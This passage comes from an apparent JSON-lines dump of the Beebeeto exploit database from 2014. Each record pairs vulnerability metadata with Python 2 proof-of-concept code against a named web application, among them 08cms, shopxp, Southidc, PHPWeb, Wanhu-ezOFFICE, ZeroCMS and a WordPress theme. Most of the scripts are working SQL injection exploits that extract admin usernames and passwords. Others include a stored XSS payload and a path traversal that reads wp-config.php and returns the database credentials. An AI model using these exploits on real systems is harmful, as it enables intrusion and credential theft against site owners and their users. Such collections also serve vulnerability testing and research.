(\"/include/paygate/alipay/pays.php?out_trade_no=22'%20AND%20(SELECT%201%20\"\r\n \"FROM(SELECT%20COUNT(*),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,\"\r\n \"0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)*2))X%20\"\r\n \"FROM%20information_schema.tables%20GROUP%20BY%20X)a)%20AND'\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r\".*?Duplicate\\s*entry\\s*[']:(?P<username>[^:]+):(?P<password>[^:]+)\", re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u6f0f\u6d1e\u51fa\u73b0\u5728/include/paygate/alipay/pays.php\u6587\u4ef6", "app_name": "08cms", "id": "poc-2014-0043", "layer4_protocol": null}
{"create_date": "2014-09-30 21:03:29", "name": "shopxp v7.4 /textbox2.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection, shopxp\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0040', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'shopxp v7.4 /textbox2.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-29', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'xpshop', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['7.4'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['SQL Injection', 'shopxp\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'N/A', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.webshell.cc/1154.html'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select\"\r\n \"%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r'.*?<body[^>]*?>(?P<account>[^<>]*?)</body>',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None or match.group('account').strip()==\"\":\r\n args['success'] = False\r\n return args\r\n account = match.group('account').strip()\r\n username = account[:-16]\r\n password = account[-16:]\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0040", "layer4_protocol": null}
{"create_date": "2014-09-29 15:55:32", "name": "ZeroCMS 1.0 /zero_transact_user.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "ZeroCMS,xss,\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0039',\r\n 'name': 'ZeroCMS 1.0 /zero_transact_user.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-09-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ZeroCMS', \r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['ZeroCMS', 'xss', '\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e'],\r\n 'desc': 'ZeroCMS\u7528\u6237\u6ce8\u518c\u9875\u9762zero_transact_user.php\u8868\u5355\u5b8c\u5168\u6ca1\u8fdb\u884c\u8fc7\u6ee4\u3002',\r\n 'references': ['http://www.exploit-db.com/exploits/34170/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/zero_transact_user.php'\r\n verify_data = 'name=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&email=%3Cscript%3E'\\\r\n 'alert%28123%29%3C%2Fscript%3E&password_1=%3Cscript%3Ealert%28123%29%3C%2Fscript'\\\r\n '%3E&password_2=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&action=Create+Account'\r\n request = urllib2.Request(verify_url, data=verify_data)\r\n response = urllib2.urlopen(request)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] POST: ' + verify_data\r\n content = response.read()\r\n if \"Duplicate entry '<script>alert(123)</script>' for key 'email'\" in content:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "ZeroCMS\u7528\u6237\u6ce8\u518c\u9875\u9762zero_transact_user.php\u8868\u5355\u5b8c\u5168\u6ca1\u8fdb\u884c\u8fc7\u6ee4\u3002", "app_name": "ZeroCMS", "id": "poc-2014-0039", "layer4_protocol": null}
{"create_date": "2014-09-29 14:45:51", "name": "Southidc\u5357\u65b9\u6570\u636e v11.0 /NewsType.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "southidc,SQL\u6ce8\u5165\u6f0f\u6d1e,SQL Injection,\u5357\u65b9\u6570\u636e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0036', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Southidc\u5357\u65b9\u6570\u636e v11.0 /NewsType.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-28', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'southidc', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['11.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['southidc', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'SQL Injection', '\u5357\u65b9\u6570\u636e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'southidc v10.0\u5230v11.0\u7248\u672c\u4e2dNewsType.asp\u6587\u4ef6\u5bf9SmallClass\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://sebug.net/vuldb/ssvid-62399'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n exp = (\"/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword\"\r\n \",2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201\"\r\n \"=2%20and%20''='\")\r\n verify_url = args['options']['target'] + exp\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r'.*?\\\">(?P<username>[a-zA-Z0-9]+)\\|(?P<password>[a-zA-Z0-9]+)',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "southidc v10.0\u5230v11.0\u7248\u672c\u4e2dNewsType.asp\u6587\u4ef6\u5bf9SmallClass\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "Southidc", "id": "poc-2014-0036", "layer4_protocol": null}
{"create_date": "2014-09-28 16:06:23", "name": "PHPWeb 2.0.5 \u4f2a\u9759\u6001 SQL\u6ce8\u5165 POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "phpweb,SQL Injection,phpweb\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0034', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'PHPWeb 2.0.5 \u4f2a\u9759\u6001 SQL\u6ce8\u5165 POC', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-28', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPWeb', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.0.5'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['phpweb', 'SQL Injection', 'phpweb\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'N/A', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://blog.163.com/sjg_admin/blog/static/22682017120139192446513/'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n if content:\r\n pattern = re.compile(r\".*?Duplicate\\s*entry\\s*[']?[0-9]*:(?P<username>[^:]+):(?P<password>[^:]+)\",re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group('username')\r\n password = match.group('password')\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "phpweb", "id": "poc-2014-0034", "layer4_protocol": null}
{"create_date": "2014-09-27 16:42:03", "name": "\u6821\u65e0\u5fe7\u5efa\u7ad9\u7cfb\u7edf /TeachView.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beeOver", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Xiao5u,TeachView.asp,Sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport time\r\nimport urllib2\r\nimport urllib\r\nimport cookielib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0032',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': '\u6821\u65e0\u5fe7\u5efa\u7ad9\u7cfb\u7edf /TeachView.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'beeOver', # \u4f5c\u8005\r\n 'create_date': '2014-09-26', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Xiao5u', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['\u975e\u5546\u4e1a\u6388\u6743\u6240\u6709\u7248\u672c'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Xiao5u', 'TeachView.asp', 'Sql injection'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Xiao5u cms website have sql injection error.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-065350', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n attack_url_base = args['options']['target'] + \"/TeachView.asp\"\r\n attack_url = attack_url_base + \"?id=99999999999%27\"\r\n user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'}\r\n request = urllib2.Request(attack_url,headers=user_agent)\r\n error_string = \"Microsoft OLE DB Provider for ODBC Drivers\"\r\n error_num = \"80040e14\"\r\n error_detail = \"[Microsoft][ODBC Microsoft Access Driver]\"\r\n\r\n try:\r\n response = urllib2.urlopen(request)\r\n except urllib2.URLError as e:\r\n if hasattr(e, 'code'):\r\n if e.getcode() == 500:\r\n content = e.read()\r\n if error_num in content and error_string in content and error_detail in content:\r\n #\u5982\u679c\u62a5500\u9519\u8bef\u4e14\u51fa\u73b0\"[Microsoft][ODBC Microsoft Access Driver] \u5b57\u7b26\u4e32\u7684\u8bed\u6cd5\u9519\u8bef \u5728\u67e5\u8be2\u8868\u8fbe\u5f0f 'id=59'' \u4e2d\u3002\"\u5219\u8bf4\u660e\u6f0f\u6d1e\u5b58\u5728\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = attack_url\r\n args['poc_ret']['tips'] = \"This website must have vulnerabilities, you can use sqlmap detect to get more information. \"\r\n #\u5982\u679c\u6f0f\u6d1e\u5b58\u5728\uff0c\u5219\u5efa\u8bae\u4f7f\u7528sqlmap\u7b49\u5de5\u5177\u8fdb\u884c\u8be6\u7ec6\u7684\u68c0\u6d4b\r\n return args\r\n\r\n args[\"success\"] = False\r\n args['poc_ret']['tips'] = \"May be this website not have this bug.\"\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Xiao5u cms website have sql injection error.", "app_name": "Other", "id": "poc-2014-0032", "layer4_protocol": null}
{"create_date": "2014-09-25 17:46:15", "name": "Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "W_HHH", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Wanhu,Wanhu-ezOFFICE", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2,urllib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0030', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'W_HHH', # \u4f5c\u8005\r\n 'create_date': '2014-09-25', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wanhu-ezOFFICE', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['*'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Wanhu', 'Wanhu-ezOFFICE'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-064324/', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @staticmethod\r\n def post(url, data):\r\n req = urllib2.Request(url)\r\n data = urllib.urlencode(data)\r\n #enable cookie\r\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())\r\n response = opener.open(req, data)\r\n return response.read()\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_path = \"/defaultroot/GraphReportAction.do?action=showResult\"\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n reinfo = '<textarea name=\"dataSQL\" rows=\"5\" style=\"width:100%\" readonly></textarea>'\r\n response = urllib2.urlopen(verify_url).read()\r\n match_hash = re.compile(reinfo)\r\n form_hash = match_hash.findall(response)\r\n if not form_hash:\r\n args['success'] = False\r\n return args\r\n\r\n # execution sql\r\n payload = {'dataSQL' : 'select USERACCOUNTS,USERPASSWORD from org_employee where EMP_ID=0'}\r\n response = cls.post(verify_url, payload)\r\n match_hash = re.compile('<td class=\"listTableLine2\">.*?</td>')\r\n form_hash = match_hash.findall(response)\r\n if len(form_hash) != 2:\r\n args['success'] = False\r\n return args\r\n\r\n # get admin user and password\r\n args['success'] = True\r\n args['poc_ret']['Admin-username'] = form_hash[0][form_hash[0].find('\">') + 2:].rstrip('</td>')\r\n args['poc_ret']['Admin-password'] = form_hash[1][form_hash[0].find('\">') + 2:].rstrip('</td>')\r\n\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0030", "layer4_protocol": null}
{"create_date": "2014-09-25 14:40:55", "name": "Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "t0nyhj", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress,Presuasion Theme,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0029', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC', # \u540d\u79f0\r\n 'author': 't0nyhj', # \u4f5c\u8005\r\n 'create_date': '2014-09-25', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\u6240\u4f7f\u7528\u7684\u7b2c\u4e09\u5c42\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress Persuasion Theme', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.x'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Arbitrary File Download', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Wordpress', 'Persuasion Theme', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d \uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u4e0b\u8f7d\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.exploit-db.com/exploits/30443/', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args): # \u5b9e\u73b0\u9a8c\u8bc1\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n vul_url = '{url}/wp-content/themes/persuasion/lib/scripts/dl-skin.php'.format(url=args['options']['target'])\r\n payload = {'_mysite_download_skin':'../../../../../wp-config.php', '_mysite_delete_skin_zip':''}\r\n data = urllib.urlencode(payload)\r\n if args['options']['verbose']:\r\n print '[*] {url} - Getting wp-config.php ...'.format(url=args['options']['target'])\r\n req = urllib2.Request(vul_url, data)\r\n response = urllib2.urlopen(req).read()\r\n if 'DB_USER' in response and 'DB_PASSWORD' in response and 'WordPress' in response:\r\n match_data1 = re.compile('\\'DB_USER\\'\\,(.*)\\)')\r\n match_data2 = re.compile('\\'DB_PASSWORD\\'\\,(.*)\\)')\r\n match_data3 = re.compile('\\'DB_HOST\\'\\,(.*)\\)')\r\n data1 = match_data1.findall(response)\r\n data2 = match_data2.findall(response)\r\n data3 = match_data3.findall(response)\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = args['options']['target'] + '/wp-content/themes/persuasion/lib/scripts/dl-skin.php'\r\n args['poc_ret']['DB_USER'] = data1[0]\r\n args['poc_ret']['DB_PASSWORD'] = data2[0]\r\n args['poc_ret']['DB_HOST'] = data3[0]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d \uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u4e0b\u8f7d\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\u3002", "app_name": "WordPress", "id": 